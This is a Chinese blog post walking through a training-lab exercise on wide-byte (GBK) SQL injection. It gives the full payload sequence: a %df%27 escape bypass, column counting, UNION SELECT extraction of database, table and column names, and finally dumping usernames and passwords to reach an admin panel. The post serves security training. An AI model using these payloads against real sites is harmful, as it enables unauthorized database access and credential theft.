SQL注入之宽字节注入–【SQL注入专题】

  • A+
所属分类:sql注入 web安全

实训目标

1、掌握SQL注入原理;
2、了解MySQL的数据结构;
3、了解宽字节的提交方式;
 

解题方向

使用宽字节注入,从数据库中获得用户密码,登录后台拿到key。
 

解题思路

一、注入点测试

在参数后面输入%df%27
http://219.153.49.228:42886/new_list.php?id=1%df%27
返回如下错误:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1�\''' at line 1
可以判断存在宽字节注入
 

二、判断字段数

id=1%df%27 order by 5%23 //页面返回正常 
id=1%df%27 order by 6%23 //页面报错
说明字段数为5
 

三、判断显示位置

id=1%df%27 and 1=2 union select 1,2,3,4,5%23
显示位置为5,3
 

四、判断当前数据库

id=1%df%27 and 1=2 union select 1,2,database(),4,5%23
当前数据库为:mozhe_discuz_stormgroup
 

五、判断数据库中的表

id=1%df%27 AND 1=2 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=0x6d6f7a68655f64697363757a5f73746f726d67726f7570%23 
//注意:mozhe_discuz_stormgroup需要进行16进制编码得到6d6f7a68655f64697363757a5f73746f726d67726f7570,需要在前面加上0x 
得到数据库中的表为:
notice,stormgroup_member

六、判断表中列

id=1%df%27 AND 1=2 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x73746f726d67726f75705f6d656d626572%23
得到列信息:
name,password,status
 

七、判断字段值

id=1%df%27 AND 1=2 union select 1,2,name,4,password from stormgroup_member limit 0,1%23 
得到第一个字段值
 
id=1%df%27 AND 1=2 union select 1,2,name,4,password from stormgroup_member limit 1,1%23 
得到第二个字段值
 
最后通过获取到的字段值就可以登录后台获取key了。

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: